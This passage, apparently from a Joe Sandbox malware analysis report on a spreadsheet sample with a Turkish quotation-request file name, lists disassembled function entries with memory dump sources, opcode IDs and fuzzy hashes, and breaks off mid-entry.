                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3c0affe5fd1c500f9fe1552074c415fb1d9c1d96fecbe44701f2491698622a77
                                                  • Instruction ID: 9e4849bb39b71e1911aa2bea46d25be6eac12616727b4e0a2c6b466546ed448c
                                                  • Opcode Fuzzy Hash: 3c0affe5fd1c500f9fe1552074c415fb1d9c1d96fecbe44701f2491698622a77
                                                  • Instruction Fuzzy Hash: 04712A74A02219CFEB64EF59D858BADBBB2FB89300F5050AAD04AA7394DB345DC1CF11
                                                  Function 03117D38 Relevance: .1, Instructions: 145COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cbbe942fd08a1eb254f632d6e9334e7ac310830192833634efd0f671c9c65af5
                                                  • Instruction ID: caf830142620692093171523f37fb1558cd6df81d5f848a670384d0b4a5d5963
                                                  • Opcode Fuzzy Hash: cbbe942fd08a1eb254f632d6e9334e7ac310830192833634efd0f671c9c65af5
                                                  • Instruction Fuzzy Hash: 1E515570A051059FDB04CF69E888BEAB7B2EB4C300F1940B5E006AB3A1CB799D95CB41
                                                  Function 057EF958 Relevance: .1, Instructions: 143COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cad919954fa1027db4bf3751d2d34e8daaaf603f5bec4503e3c0b8c7e6ed753c
                                                  • Instruction ID: a113c64df4fe16d25301f1f9e4a13f3115658ba14764389612ff8768e5e2c454
                                                  • Opcode Fuzzy Hash: cad919954fa1027db4bf3751d2d34e8daaaf603f5bec4503e3c0b8c7e6ed753c
                                                  • Instruction Fuzzy Hash: 22515B34B106099FCB04EF65E499AAEBBB6FFC9701F008119F5069B364DF309946DB91
                                                  Function 057E2E5C Relevance: .1, Instructions: 141COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a0bc3fa28fb3800b701be8556ff35bd9810677222d2f96acf05cd8afd809d48b
                                                  • Instruction ID: f7a3f344ece8d298855536885e3eb2b37acead7c7329d77a1853508faefb5903
                                                  • Opcode Fuzzy Hash: a0bc3fa28fb3800b701be8556ff35bd9810677222d2f96acf05cd8afd809d48b
                                                  • Instruction Fuzzy Hash: A551E3758097808FC322CB78895D9A6BFF8FF5A200B19C9EEC495DB653D630A601FB01
                                                  Function 05E00790 Relevance: .1, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 667741a8015851047c758f2eceea6c419be135e3f978abf1d682551492a7b516
                                                  • Instruction ID: 136d8f6d52b8f65e22a86603114a4516c78443ec9e319146e1a585c6e49c7a7e
                                                  • Opcode Fuzzy Hash: 667741a8015851047c758f2eceea6c419be135e3f978abf1d682551492a7b516
                                                  • Instruction Fuzzy Hash: BD510874A02219CFEB54EF69D854BAEBBB2FB89300F0081AAE44DA7354DB345D85CF51
                                                  Function 05AD7CA8 Relevance: .1, Instructions: 137COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: af56a293c093e405e658a496877386689f1cd3863e673c5474c82df01aa591bd
                                                  • Instruction ID: 534c4f3994765334ce41ac7f2d7636f8d80ae363b9636a7f8f2462e3b3f8f24e
                                                  • Opcode Fuzzy Hash: af56a293c093e405e658a496877386689f1cd3863e673c5474c82df01aa591bd
                                                  • Instruction Fuzzy Hash: 1341E0758092888FCB1DEF68D485FADFFB1EB02214F544199E447AB356E7348A85CB31
                                                  Function 057E8DA8 Relevance: .1, Instructions: 135COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 79a3cf9aa1e4a55fd514b86b36f379ee6bde8a563407c657920cce954cec62f2
                                                  • Instruction ID: 7f100827fa56c302d2bfbc3d8abfdf10d565f014c6e28141b434e09e558f1ba4
                                                  • Opcode Fuzzy Hash: 79a3cf9aa1e4a55fd514b86b36f379ee6bde8a563407c657920cce954cec62f2
                                                  • Instruction Fuzzy Hash: DD51BBB4E14258DFCB04DFA8D488AACBBF2BB4D301F20446AE406BB355DB316941EB51
                                                  Function 05E007A0 Relevance: .1, Instructions: 135COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ec5771e5f9acb0a99d350d9aeb4f94481875cc3e40f8f5d132ee0edfa9b8473c
                                                  • Instruction ID: b117dafd337706e8c85c04cafa722765666f0f52fe1eab6d7c7fc39731583341
                                                  • Opcode Fuzzy Hash: ec5771e5f9acb0a99d350d9aeb4f94481875cc3e40f8f5d132ee0edfa9b8473c
                                                  • Instruction Fuzzy Hash: 01511C74A02219CFEB54EF69D854BADBBB2FB89300F0081AAE40DA7354DB345D85CF51
                                                  Function 05E034A4 Relevance: .1, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b89a0b5dc8f510445bb9ed6251eb162934565e23f3ca126ffe20eaefac0bdb30
                                                  • Instruction ID: 678af3d61526fdb39975305f2cfed2c410b3ad48a63d96cec0b81e9f4ec6fd45
                                                  • Opcode Fuzzy Hash: b89a0b5dc8f510445bb9ed6251eb162934565e23f3ca126ffe20eaefac0bdb30
                                                  • Instruction Fuzzy Hash: CC51CFB8905228CFEB60CF59C888BE9BBF1BB49304F44A0EAD549B3280D7745AC5CF15
                                                  Function 03115240 Relevance: .1, Instructions: 131COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9336a7cc65ba5615563f4bb24a442507ffe02e21410704b7b4b064d0a6128ecc
                                                  • Instruction ID: 51b1e37f91378bc9b944f562a7f8df196ae84ba08e79ce9cd04beaa56124d327
                                                  • Opcode Fuzzy Hash: 9336a7cc65ba5615563f4bb24a442507ffe02e21410704b7b4b064d0a6128ecc
                                                  • Instruction Fuzzy Hash: DB416A32B10104CFDB04CA69D884BEAB7B7EBCE315F2582B6D10ACB664D7B4DD918B51
                                                  Function 05AE6EE8 Relevance: .1, Instructions: 130COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: acb4f28b28eb968eeff8ef370818198e869a39842f3f800a9fdd83c4711070a8
                                                  • Instruction ID: 6853397e6b390ee5e55774db99ee88bb0886ae8effa13889374c1242e83a8483
                                                  • Opcode Fuzzy Hash: acb4f28b28eb968eeff8ef370818198e869a39842f3f800a9fdd83c4711070a8
                                                  • Instruction Fuzzy Hash: D541DE31B047108FCB64DB78E554AAEBBF2FF94750B00886ED06AC7A84DB30E901CB81
                                                  Function 05E3FB38 Relevance: .1, Instructions: 128COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fb77579350a212d11f359e8e1a8543c4e9deb16fa774ca852d165ce9c81cbe36
                                                  • Instruction ID: 50d8e965c16889acec6c8f3b78733750fa5fdab687cf3b0449ca27319456bd9d
                                                  • Opcode Fuzzy Hash: fb77579350a212d11f359e8e1a8543c4e9deb16fa774ca852d165ce9c81cbe36
                                                  • Instruction Fuzzy Hash: F7412B317482009FD715CF6DE89995ABFE5EF85310B1580BAE15EC7262DB39EC41C760
                                                  Function 05E00B28 Relevance: .1, Instructions: 125COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cfc18a01a0d2561a061cb30b4b740341d09482bf14b25cc332940399f6c577d8
                                                  • Instruction ID: 5777fab3c33f52b676f24ef99ca634b600d12edbcb7a00329d4b2a85b8206b6f
                                                  • Opcode Fuzzy Hash: cfc18a01a0d2561a061cb30b4b740341d09482bf14b25cc332940399f6c577d8
                                                  • Instruction Fuzzy Hash: 7C513D74A02219CFEB54EF69D854BAE7BB2FB49300F0051AAD04DA7294EB345DC5CF51
                                                  Function 05AE7461 Relevance: .1, Instructions: 121COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0b70ff5576b4a74d062b58311be48e008163dc7f2b24de15e3c912578663d932
                                                  • Instruction ID: f25f4984453e6e7f7b2e11874881add976bb10818c195f3b5c768457f53afd3d
                                                  • Opcode Fuzzy Hash: 0b70ff5576b4a74d062b58311be48e008163dc7f2b24de15e3c912578663d932
                                                  • Instruction Fuzzy Hash: 2F410630B043459FCB25DF68C815AAEBFB2FF86710F10845AE655DB390DB309906CBA0
                                                  Function 05AE7318 Relevance: .1, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e1300ff61f15679753dc9ecb585da44ab05d72c02dd5a56dd7091a02883afb09
                                                  • Instruction ID: ad0aace84d5949a54cfffa72b1a20935cc0c4fdcf80d48d28cd852870c242931
                                                  • Opcode Fuzzy Hash: e1300ff61f15679753dc9ecb585da44ab05d72c02dd5a56dd7091a02883afb09
                                                  • Instruction Fuzzy Hash: FA419C75A00B859FCB21CF69C948E6EBBF2FF88300F048959D99283A50DB30E805DF61
                                                  Function 05ADBBB8 Relevance: .1, Instructions: 117COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: fcd1bd846e4d645ef12aefdc87ab5d544a6704fa6da04c9101f1fa1bc9a8ea8a
                                                  • Instruction ID: 77bc60aeb898ed9925a027c36f919a948882f1e4a69d59f81d3cf550e19a2e33
                                                  • Opcode Fuzzy Hash: fcd1bd846e4d645ef12aefdc87ab5d544a6704fa6da04c9101f1fa1bc9a8ea8a
                                                  • Instruction Fuzzy Hash: C8414934B002099FCB18EB69D894F6ABBB6FB89200F11842AE8169B255DF34D801CF70
                                                  Function 057ECA08 Relevance: .1, Instructions: 116COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d5b8e63f5d43c436b121cf6746ba342d533cf5052031c0c01354604e1229de0b
                                                  • Instruction ID: 27d813ffe9a1bcc39b6305be1457c623fa914d50f3f275176451f495b318d232
                                                  • Opcode Fuzzy Hash: d5b8e63f5d43c436b121cf6746ba342d533cf5052031c0c01354604e1229de0b
                                                  • Instruction Fuzzy Hash: 4C41C674E01208CFDB29DFB9D44469DBBB6BF88344F24812EE419AB261DB319D42CF40
                                                  Function 057ECA18 Relevance: .1, Instructions: 115COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 37fdede03535d58788a3479916888f1f2978b51d5cff6e4ce500b13a24417673
                                                  • Instruction ID: e8390d3a97e567357674cbade494462ad0109936756d8904223809976931e6c5
                                                  • Opcode Fuzzy Hash: 37fdede03535d58788a3479916888f1f2978b51d5cff6e4ce500b13a24417673
                                                  • Instruction Fuzzy Hash: DE51A474E01208DFDB19DFB9D594A9DBBB2BF89304F20812EE419AB364DB359941CF40
                                                  Function 05E0378C Relevance: .1, Instructions: 113COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 48d665f5deef02f6f6521fbf07fb76bf7c1c5afeb487fa822bee8a3b50ecaf40
                                                  • Instruction ID: f0a9fabe4cee971a7dbef85e8c67d05b08d799f4cf7697910007557cc626396e
                                                  • Opcode Fuzzy Hash: 48d665f5deef02f6f6521fbf07fb76bf7c1c5afeb487fa822bee8a3b50ecaf40
                                                  • Instruction Fuzzy Hash: B451E274905218CFDBA4CF59D888BE9B7F2BB49304F54A0EAC149B3280DB745AC5CF14
                                                  Function 05E00B4E Relevance: .1, Instructions: 111COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 87b69dd977a508cac6fc4fec5840b8352a1c632ac40dd8c8b020e0e880a87ff9
                                                  • Instruction ID: 7792e0d86d6c79c44276ba1e92ed6527e278eb72e59e3ff9faaa785ec7f649c0
                                                  • Opcode Fuzzy Hash: 87b69dd977a508cac6fc4fec5840b8352a1c632ac40dd8c8b020e0e880a87ff9
                                                  • Instruction Fuzzy Hash: 7F51D974A02219CFEB54EF69D894BAD7BB2FB49300F0041AAE44EA7354DB345D85CF51
                                                  Function 03115230 Relevance: .1, Instructions: 106COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: acad1ed7c1fd0fcc45db237a857b13c5176bf2bfd0254994ad1e63dfdc734c9e
                                                  • Instruction ID: 0ab10fef0b10000917fd88ba6a8ec6bbbdea6bf63844cd251e90ca4b0c474ff5
                                                  • Opcode Fuzzy Hash: acad1ed7c1fd0fcc45db237a857b13c5176bf2bfd0254994ad1e63dfdc734c9e
                                                  • Instruction Fuzzy Hash: 0431CE72B14104CFC714CE69D880BEEB7B2FBCE314F2581B6D10A97665D7B49D918B50
                                                  Function 05AE20CB Relevance: .1, Instructions: 104COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1f4dfee1c342432d445fb00d2ddf8f4d032894ba9a913e701486e21822f23ff8
                                                  • Instruction ID: bfd5516960866052914d83123e129c6e9a2457b6d9c8700be4c22e69abfa695e
                                                  • Opcode Fuzzy Hash: 1f4dfee1c342432d445fb00d2ddf8f4d032894ba9a913e701486e21822f23ff8
                                                  • Instruction Fuzzy Hash: 31314A366102149FDB19CF54D844F69BBBAFF89320F0580A9EA199B372C731ED92DB50
                                                  Function 05AE1910 Relevance: .1, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 243b0330a4920e5a1b2d4ff6a8972f6b306750576103d2cc5280868e170ef12e
                                                  • Instruction ID: 56680c972bec6e62fbd41295f19ae00a516c442114073b568022d2d6ea636ced
                                                  • Opcode Fuzzy Hash: 243b0330a4920e5a1b2d4ff6a8972f6b306750576103d2cc5280868e170ef12e
                                                  • Instruction Fuzzy Hash: 0E31D336610118AFCB05DF59D888EA9BBB2FF48320F1680A9E51A9B372C731ED55DB50
                                                  Function 05AD6578 Relevance: .1, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 429131f453b942ab6d2734da67d2f94855027dceb39a703dcd35a4205a6bd6fa
                                                  • Instruction ID: 7049f37cca127e0c34b1780637d2997fea00d02f858ed93bee80ff825eb70d94
                                                  • Opcode Fuzzy Hash: 429131f453b942ab6d2734da67d2f94855027dceb39a703dcd35a4205a6bd6fa
                                                  • Instruction Fuzzy Hash: 01412270D052188FDB04DFA9D944BEEFBF2BB49300F00806AE416A7295D7759A85CF61
                                                  Function 05ADBD48 Relevance: .1, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 425dc26397c9f57cf34cd8d89a9ad2d6c3645e9ee43fd62df438bed94758f311
                                                  • Instruction ID: 2ee02e23bda5d8c8f77ca2114886ce5bf6d33bd96c7b6a96ff6f9d18e48de61b
                                                  • Opcode Fuzzy Hash: 425dc26397c9f57cf34cd8d89a9ad2d6c3645e9ee43fd62df438bed94758f311
                                                  • Instruction Fuzzy Hash: 0E416B71A002198FCB14DFA9C844AAEFBB1FF88301F018469D526E7291DB34D945CBB1
                                                  Function 05ADAF10 Relevance: .1, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 837e3d26007a4090ea0db50ccf0d623c2da51c3825e2cefca2c2c2bb610c86e2
                                                  • Instruction ID: 038a3e1868b1f4a6f8d0ec2247b03c03782ddec7d29f4dc0f351f77b65fa4be6
                                                  • Opcode Fuzzy Hash: 837e3d26007a4090ea0db50ccf0d623c2da51c3825e2cefca2c2c2bb610c86e2
                                                  • Instruction Fuzzy Hash: D5316175A052099FCB04DF68E884E9EFBB5FF49310F1540AAE916DB360DB319905CB70
                                                  Function 05E01FB9 Relevance: .1, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c10b158ed7d1cebcc811a6108b19aa3ce0fbbf36ab457cd775aa0c40dd565297
                                                  • Instruction ID: 4feac2e998f7806b97f18d61a03efaa6948345cb05783823b4dc19ba5a59f7ea
                                                  • Opcode Fuzzy Hash: c10b158ed7d1cebcc811a6108b19aa3ce0fbbf36ab457cd775aa0c40dd565297
                                                  • Instruction Fuzzy Hash: 2F4105B4A11218CFDB14CF94D848BEDBBB2FB49304F40602AE54AAB290D7799984CF55
                                                  Function 05AE42F8 Relevance: .1, Instructions: 94COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b145b377a217c41666dae2d0a94ea93d03ee26d41a6a5e0167d3e7491fbd2672
                                                  • Instruction ID: e2420d3185e1b831f226ca542727bf6622d8871dd16ce00524e39fe8e4941fa2
                                                  • Opcode Fuzzy Hash: b145b377a217c41666dae2d0a94ea93d03ee26d41a6a5e0167d3e7491fbd2672
                                                  • Instruction Fuzzy Hash: F1310A35B00119DBDF14DFA4D955AEEBBB6FF88310F108125E912B7264DB31AD45CBA0
                                                  Function 05ADC703 Relevance: .1, Instructions: 93COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 410ba1c6e76ff416eaacc387dbad5b89a1ff55d6ef49195d873f92f592fe506f
                                                  • Instruction ID: 5904830381cbd62bdc703586a96bb10e779b843589fc2992e032fdb86e80444e
                                                  • Opcode Fuzzy Hash: 410ba1c6e76ff416eaacc387dbad5b89a1ff55d6ef49195d873f92f592fe506f
                                                  • Instruction Fuzzy Hash: 92413A74A012188FEB24EB24CDA1FA9B7B1BF58710F5001D5EA0AAB391D731DD81CF60
                                                  Function 05AD82A0 Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 166299feb2a9a9dd2ca62dcb127186538bade7d15e2e81b8190ed46f330f26bb
                                                  • Instruction ID: 2b17a19b0cc6445594eceb807ddf4de1a9a308401674e646953dd725c3928c94
                                                  • Opcode Fuzzy Hash: 166299feb2a9a9dd2ca62dcb127186538bade7d15e2e81b8190ed46f330f26bb
                                                  • Instruction Fuzzy Hash: 003118B4E056099FDB04DF9AD484AEEBBF6FB89300F10C069D826A3354D7785941CF64
                                                  Function 03110860 Relevance: .1, Instructions: 92COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
